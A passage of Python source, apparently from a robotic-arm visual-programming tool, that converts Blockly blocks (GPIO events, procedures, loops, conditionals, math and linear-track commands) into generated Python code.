self._insert_to_file(self.index, ' self.listen_cgpio_state = False')
self._insert_to_file(self.index, ' self.values = {'
'\'tgpio\': {\'digital\': [0] * 2, \'analog\': [0] * 2, \'digital_o\': [0] * 2, \'analog_o\': [0] * 2},'
'\'cgpio\': {\'digital\': [1] * 16, \'analog\': [0] * 2, \'digital_o\': [1] * 16, \'analog_o\': [0] * 2}}')
self._insert_to_file(self.index, ' self.tgpio_digital_callbacks = []')
self._insert_to_file(self.index, ' self.tgpio_analog_callbacks = []')
self._insert_to_file(self.index, ' self.cgpio_callbacks = []')
self._insert_to_file(self.index, '\n def cgpio_digitals_is_matchs_bin(self, bin_val):')
self._insert_to_file(self.index, ' digitals_bin = \'\'.join(map(str, self.values[\'cgpio\'][\'digital\']))')
self._insert_to_file(self.index, ' length = min(len(digitals_bin), len(bin_val))')
self._insert_to_file(self.index, ' bin_val_ = bin_val[::-1]')
self._insert_to_file(self.index, ' for i in range(length):')
self._insert_to_file(self.index, ' if bin_val_[i] != digitals_bin[i]:')
self._insert_to_file(self.index, ' return False')
self._insert_to_file(self.index, ' return True')
self._insert_to_file(self.index, '\n def run(self):')
self._insert_to_file(self.index, ' self.alive = True')
self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._insert_to_file(self.index, ' if self.listen_tgpio_digital or len(self.tgpio_digital_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_digital()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_digital:')
self._insert_to_file(self.index, ' for item in self.tgpio_digital_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'digital\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = True')
self._insert_to_file(self.index, ' if self.listen_tgpio_analog or len(self.tgpio_analog_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_analog()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_analog:')
self._insert_to_file(self.index, ' for item in self.tgpio_analog_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'analog\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = True')
self._insert_to_file(self.index, ' if self.listen_cgpio_state or len(self.cgpio_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_cgpio_state()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' digitals = [values[3] >> i & 0x0001 if values[10][i] in [0, 255] else 1 for i in range(len(values[10]))]')
self._insert_to_file(self.index, ' digitals_o = [values[5] >> i & 0x0001 for i in range(len(values[11]))]')
self._insert_to_file(self.index, ' analogs = [values[6], values[7]]')
self._insert_to_file(self.index, ' analogs_o = [values[8], values[9]]')
self._insert_to_file(self.index, ' if self.is_init_cgpio_state:')
self._insert_to_file(self.index, ' for item in self.cgpio_callbacks:')
self._insert_to_file(self.index, ' if item[\'type\'] == \'digital\':')
self._insert_to_file(self.index, ' for io in range(len(digitals)):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(digitals[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' elif item[\'type\'] == \'analog\':')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(analogs[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital\'] = digitals')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog\'] = analogs')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital_o\'] = digitals_o')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog_o\'] = analogs_o')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = True')
self._insert_to_file(self.index, ' time.sleep(0.1)')
self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
self._events['gpio'] = {}
if not gpio_type.startswith('listen'):
if gpio_type not in self._events['gpio']:
self._events['gpio'][gpio_type] = 2
else:
self._events['gpio'][gpio_type] += 1
self._hasEvent = True
def _handle_event_gpio_digital(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_analog(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_analog', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_analog(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_analog', block, prefix, arg_map=arg_map)
def _handle_gpio_controller_digitals_listen(self, block, prefix, arg_map=None):
self.__handle_gpio_event('listen_cgpio_state', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital_di(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
# def _handle_event_gpio_digital(self, block, prefix=''):
# fields = self.get_nodes('field', root=block)
# io = fields[0].text
# trigger = fields[1].text
#
# if 'gpio' not in self._events:
# num = 1
# else:
# num = self._events['gpio'] + 1
# name = '{}_io{}_is_{}_{}'.format(block.attrib['type'], io, trigger.lower(), num)
# self._append_to_file('\n\n{}# Define TGPIO-{} is {} callback'.format(prefix, io, trigger))
# self._append_to_file('{}def {}():'.format(prefix, name))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# self._append_to_file('\n{}params[\'events\'][\'gpio\'].callbacks[\'IO{}\'][{}].append({})'.format(
# old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
# self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
# self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
#
# if 'gpio' not in self._events:
# name2 = 'EventGPIOThread'.format(io, trigger.capitalize())
# self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
# self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
# self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
# '\n threading.Thread.__init__(self, *args, **kwargs)')
# self._insert_to_file(self.index, ' self.daemon = True')
# self._insert_to_file(self.index, ' self.alive = False')
# self._insert_to_file(self.index, ' self.digital = [-1, -1]')
# self._insert_to_file(self.index, ' self.callbacks = {\'IO0\': {0: [], 1: []}, '
# '\'IO1\': {0: [], 1: []}}')
# self._insert_to_file(self.index, '\n def run(self):')
# self._insert_to_file(self.index, ' self.alive = True')
# self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0:')
# self._insert_to_file(self.index, ' _, digital = arm.get_tgpio_digital()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' if digital[0] != self.digital[0]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO0\'][digital[0]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if digital[1] != self.digital[1]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO1\'][digital[1]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' self.digital = digital')
# self._insert_to_file(self.index, ' time.sleep(0.1)')
# self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
#
# if 'gpio' not in self._events:
# self._events['gpio'] = 2
# else:
# self._events['gpio'] += 1
#
# self._hasEvent = True
def _handle_procedures_defnoreturn(self, block, prefix='', arg_map=None):
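        # Each Blockly procedure definition is emitted as a @classmethod on a generated MyDef
        # helper class; Blockly argument names are remapped to arg_1, arg_2, ... so the generated
        # code does not depend on user-supplied identifiers.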
if not self._func_cls_exist:
name = 'MyDef'
self._insert_to_file(self.first_index, '\n\n# Define Mydef class')
self._insert_to_file(self.first_index, 'class {}(object):'.format(name))
self._insert_to_file(self.first_index,
' def __init__(self, *args, **kwargs):\n pass')
self._func_cls_exist = True
field = self.get_node('field', block).text
if not field:
field = '1'
if field not in self._funcs:
name = 'function_{}'.format(self.func_index)
else:
name = self._funcs[field]
self._is_insert = True
try:
args = self.get_nodes('arg', root=self.get_node('mutation', block))
arg_map_ = None
self._append_to_file('\n @classmethod')
if not args:
self._append_to_file(' def {}(cls):'.format(name))
else:
arg_list = [arg.attrib['name'] for arg in args]
# arg_map_ = {arg: arg for i, arg in enumerate(arg_list)}
arg_map_ = {arg: 'arg_{}'.format(i + 1) for i, arg in enumerate(arg_list)}
self._append_to_file(' def {}(cls, {}):'.format(name, ','.join(map(lambda x: arg_map_[x], arg_list))))
# self._append_to_file(' def {}(cls):'.format(name))
prefix = ' '
comment = self.get_node('comment', block).text
self._append_to_file('{}"""'.format(prefix))
self._append_to_file('{}{}'.format(prefix, comment))
self._append_to_file('{}"""'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
self.parse(statement, prefix, arg_map=arg_map_)
else:
self._append_to_file('{}pass'.format(prefix))
self._funcs[field] = name
return arg_map_
except:
self._succeed = False
finally:
self._is_insert = False
def _handle_procedures_defreturn(self, block, prefix='', arg_map=None):
arg_map_ = self._handle_procedures_defnoreturn(block, prefix)
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map_)
self._is_insert = True
prefix = ' '
self._append_to_file('{}return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callnoreturn(self, block, prefix='', arg_map=None):
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
self._append_to_file('{}MyDef.{}({})'.format(prefix, name, ','.join([self.__get_condition_expression(val, arg_map=arg_map) for val in values])))
else:
self._append_to_file('{}MyDef.{}()'.format(prefix, name))
# self._append_to_file('{}MyDef.{}()'.format(prefix, name))
self._funcs[mutation] = name
def _handle_procedures_ifreturn(self, block, prefix='', arg_map=None):
self._is_insert = True
values = self.get_nodes('value', block)
expression = self.__get_condition_expression(values[0], arg_map=arg_map)
self._append_to_file('{}if {}:'.format(prefix, expression))
expression = self.__get_condition_expression(values[1], arg_map=arg_map)
self._append_to_file('{} return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callreturn(self, block, prefix='', arg_map=None):
self._handle_procedures_callnoreturn(block, prefix, arg_map=arg_map)
def _handle_variables_set(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} = {}'.format(prefix, arg_map[field], expression))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} = {}'.format(prefix, field, expression))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
def _handle_math_change(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
shadow = self.get_node('shadow', root=value)
val = self.get_node('field', root=shadow).text
# self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} += {}'.format(prefix, arg_map[field], val))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} += {}'.format(prefix, field, val))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
def _handle_controls_repeat_ext(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
# times = self.get_nodes('field', root=value, descendant=True)[0].text
times = self.__get_block_val(value, arg_map=arg_map)
self._append_to_file('{}for i in range(int({})):'.format(prefix, times))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
# def handle_controls_for(self, block, prefix=''):
# print(block.attrib.get('disabled', False))
def _handle_controls_whileUntil(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field.text == 'WHILE':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while {} and not params[\'quit\']:'.format(prefix, expression))
elif field.text == 'UNTIL':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while not {} and not params[\'quit\']:'.format(prefix, expression))
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_run_forever(self, block, prefix='', arg_map=None):
self._append_to_file('{}while True:'.format(prefix))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_break(self, block, prefix='', arg_map=None):
self._append_to_file('{}break'.format(prefix))
def _handle_tool_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_app_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# [APP] {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_remark(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
def _handle_controls_if(self, block, prefix='', arg_map=None):
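        # Blockly provides one <value>/<statement> pair per IF/ELSE IF branch plus an optional
        # ELSE statement; translate them into an if/elif/else chain, emitting 'pass' for empty
        # branches.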
values = self.get_nodes('value', root=block)
statements = self.get_nodes('statement', root=block)
old_prefix = prefix
has_if = False
for i, value in enumerate(values):
prefix = old_prefix
expression = self.__get_condition_expression(value, arg_map=arg_map)
if not has_if:
has_if = True
self._append_to_file('{}if {}:'.format(prefix, expression))
else:
self._append_to_file('{}elif {}:'.format(prefix, expression))
old_prefix = prefix
prefix = ' ' + prefix
statement = None
for st in statements:
if st.attrib['name'][2:] == value.attrib['name'][2:]:
statement = st
break
if statement:
self.parse(statement, prefix, arg_map=arg_map)
else:
self._append_to_file('{}pass'.format(prefix))
for st in statements:
if st.attrib['name'] == 'ELSE':
if has_if:
self._append_to_file('{}else:'.format(old_prefix))
self.parse(st, old_prefix if not has_if else ' ' + old_prefix, arg_map=arg_map)
break
# value = self.get_node('value', root=block)
# expression = self.__get_condition_expression(value)
# self._append_to_file('{}if {}:'.format(prefix, expression))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement_if = self.get_nodes('statement', root=block, name='DO0')
# statement_else = self.get_nodes('statement', root=block, name='ELSE')
# if statement_if:
# self.parse(statement_if[0], prefix)
# if statement_else:
# self._append_to_file('{}else:'.format(old_prefix))
# self.parse(statement_else[0], prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
def __get_condition_expression(self, value_block, arg_map=None):
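        # Recursively translate a Blockly <value> node into a Python expression string,
        # dispatching on the type of the inner <block> (logic, GPIO reads, math, variables,
        # procedure calls, ...); a bare <shadow> falls through to its literal field text.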
block = self.get_node('block', value_block)
if block is None:
shadow = self.get_node('shadow', root=value_block)
return self.get_node('field', root=shadow).text
if block.attrib['type'] == 'logic_boolean':
return str(self.get_node('field', block).text == 'TRUE')
elif block.attrib['type'] == 'logic_compare':
op = self._ops.get(self.get_node('field', block).text)
cond_a = 0
cond_b = 0
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_operation':
op = self.get_node('field', block).text.lower()
cond_a = False
cond_b = False
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_negate':
value = self.get_node('value', root=block)
return 'not ({})'.format(self.__get_condition_expression(value, arg_map=arg_map))
elif block.attrib['type'] == 'gpio_get_digital':
io = self.get_node('field', block).text
return 'arm.get_tgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_analog':
io = self.get_node('field', block).text
return 'arm.get_tgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_digital':
io = self.get_node('field', block).text
return 'arm.get_cgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_digital_di':
io = self.get_node('field', block).text
return 'arm.get_cgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_analog':
io = self.get_node('field', block).text
return 'arm.get_cgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_ci':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital\'][{}] if \'gpio\' in params[\'events\'] else 1'.format(io)
elif block.attrib['type'] == 'gpio_get_co':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ai':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ao':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_match_controller_digitals_bin':
bin_val = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].cgpio_digitals_is_matchs_bin(\'{}\') if \'gpio\' in params[\'events\'] else False'.format(
bin_val)
elif block.attrib['type'] == 'get_suction_cup':
return 'arm.get_suction_cup()[{}]'.format(1)
elif block.attrib['type'] == 'check_air_pump_state':
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
return 'arm.arm.check_air_pump_state({}, timeout={})'.format(state, timeout)
elif block.attrib['type'] == 'check_bio_gripper_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_bio_gripper_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'check_robotiq_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_robotiq_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'math_number':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'math_arithmetic':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
if field == 'ADD':
return '({} + {})'.format(val_a, val_b)
elif field == 'MINUS':
return '({} - {})'.format(val_a, val_b)
elif field == 'MULTIPLY':
return '({} * {})'.format(val_a, val_b)
elif field == 'DIVIDE':
return '({} / {})'.format(val_a, val_b)
elif field == 'POWER':
return 'pow({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_number_property':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'EVEN':
# 偶数
return '{} % 2 == 0'.format(val_a)
elif field == 'ODD':
# 奇数
return '{} % 2 == 1'.format(val_a)
elif field == 'PRIME':
# 质数
return 'utils.is_prime({})'.format(val_a)
elif field == 'WHOLE':
return '{} % 1 == 0'.format(val_a)
elif field == 'POSITIVE':
# 正数
return '{} > 0'.format(val_a)
elif field == 'NEGATIVE':
# 负数
return '{} < 0'.format(val_a)
elif field == 'DIVISIBLE_BY':
# 可被整除
if len(values) > 1:
val_b = self.__get_block_val(values[1], arg_map=arg_map)
else:
val_b = 0
return '{} % {} == 0'.format(val_a, val_b)
elif block.attrib['type'] == 'math_random_int':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return 'random.randint({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_round':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROUND':
# 四舍五入
return 'round({})'.format(val_a)
elif field == 'ROUNDUP':
# 上舍入
return 'math.ceil({})'.format(val_a)
elif field == 'ROUNDDOWN':
# 下舍入
return 'math.floor({})'.format(val_a)
elif block.attrib['type'] == 'math_single':
# 算术函数
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROOT':
# 平方根
return 'math.sqrt({})'.format(val_a)
elif field == 'ABS':
# 绝对值
return 'abs({})'.format(val_a)
elif field == 'NEG':
# 相反数
return '-{}'.format(val_a)
elif field == 'LN':
# ln
return 'math.log({})'.format(val_a)
elif field == 'LOG10':
# log10
return '(math.log({}) / math.log(10))'.format(val_a)
elif field == 'EXP':
# exp
return 'math.exp({})'.format(val_a)
elif field == 'POW10':
# 10的多少次方
return 'math.pow(10, {})'.format(val_a)
elif block.attrib['type'] == 'math_trig':
# 三角函数
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'SIN':
return 'math.sin({})'.format(val_a)
elif field == 'COS':
return 'math.cos({})'.format(val_a)
elif field == 'TAN':
return 'math.tan({})'.format(val_a)
elif field == 'ASIN':
return 'math.asin({})'.format(val_a)
elif field == 'ACOS':
return 'math.acos({})'.format(val_a)
elif field == 'ATAN':
return 'math.atan({})'.format(val_a)
elif block.attrib['type'] == 'math_constant':
# 常量
field = self.get_node('field', block).text
if field == 'PI':
return 'math.pi'
elif field == 'E':
return 'math.e'
elif field == 'GOLDEN_RATIO':
return '(1 + math.sqrt(5)) / 2'
elif field == 'SQRT2':
return 'math.sqrt(2)'
elif field == 'SQRT1_2':
return 'math.sqrt(0.5)'
elif field == 'INFINITY':
return 'math.inf'
elif block.attrib['type'] == 'math_modulo':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return '{} % {}'.format(val_a, val_b)
elif block.attrib['type'] == 'math_constrain':
values = self.get_nodes('value', block)
if len(values) > 2:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
val_c = self.__get_block_val(values[2], arg_map=arg_map)
return 'min(max({}, {}), {})'.format(val_a, val_b, val_c)
# elif block.attrib['type'] == 'math_round':
# pass
elif block.attrib['type'] == 'variables_get':
field = self.get_node('field', block).text
# return '(params[\'variables\'].get(\'{}\', 0) if \'{}\' in locals_keys or \'{}\' not in locals() else {})'.format(field, field, field, field)
if arg_map and field in arg_map:
return '{}'.format(arg_map[field])
else:
return 'params[\'variables\'].get(\'{}\', 0)'.format(field)
elif block.attrib['type'] == 'move_var':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'tool_get_date':
return 'datetime.datetime.now()'
elif block.attrib['type'] == 'tool_combination':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
var1 = self.__get_condition_expression(values[0], arg_map=arg_map)
var2 = self.__get_condition_expression(values[1], arg_map=arg_map)
return '\'{{}}{{}}{{}}\'.format({}, \'{}\', {})'.format(var1, field, var2)
elif block.attrib['type'] == 'procedures_callreturn':
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
return 'MyDef.{}({})'.format(name, ','.join(
[self.__get_condition_expression(val, arg_map=arg_map) for val in values]))
else:
return 'MyDef.{}()'.format(name)
# return 'MyDef.{}()'.format(name)
def __get_block_val(self, block, arg_map=None):
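        # A <value> node either wraps a full <block> (recurse into the expression builder)
        # or a <shadow> literal whose field text is used directly.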
block_v = self.get_node('block', root=block)
if block_v is not None:
val = self.__get_condition_expression(block, arg_map=arg_map)
else:
shadow = self.get_node('shadow', root=block)
val = self.get_node('field', root=shadow).text
return val
def _handle_set_line_track(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
if fields is not None:
pos = fields[0].text
speed = fields[1].text
wait = True
else:
values = self.get_nodes('value', root=block)
pos = self.get_nodes('field', root=values[0], descendant=True)[0].text
speed = self.get_nodes('field', root=values[1], descendant=True)[0].text
wait = True
if self._show_comment:
            self._append_to_file('{}# set line track position and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_linear_track_pos({}, speed={}, wait={}, auto_enable=True)'.format(prefix, pos, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_linear_track_pos, code={{}}\'.format(code))'.format(prefix))
def _handle_set_line_track_origin(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_line_track_origin(wait=True, auto_enable=True)'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_linear_track_back_origin(wait=True, auto_enable=True)'.format(prefix))
self._append_to_file('{} code = arm.set_linear_track_enable(True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
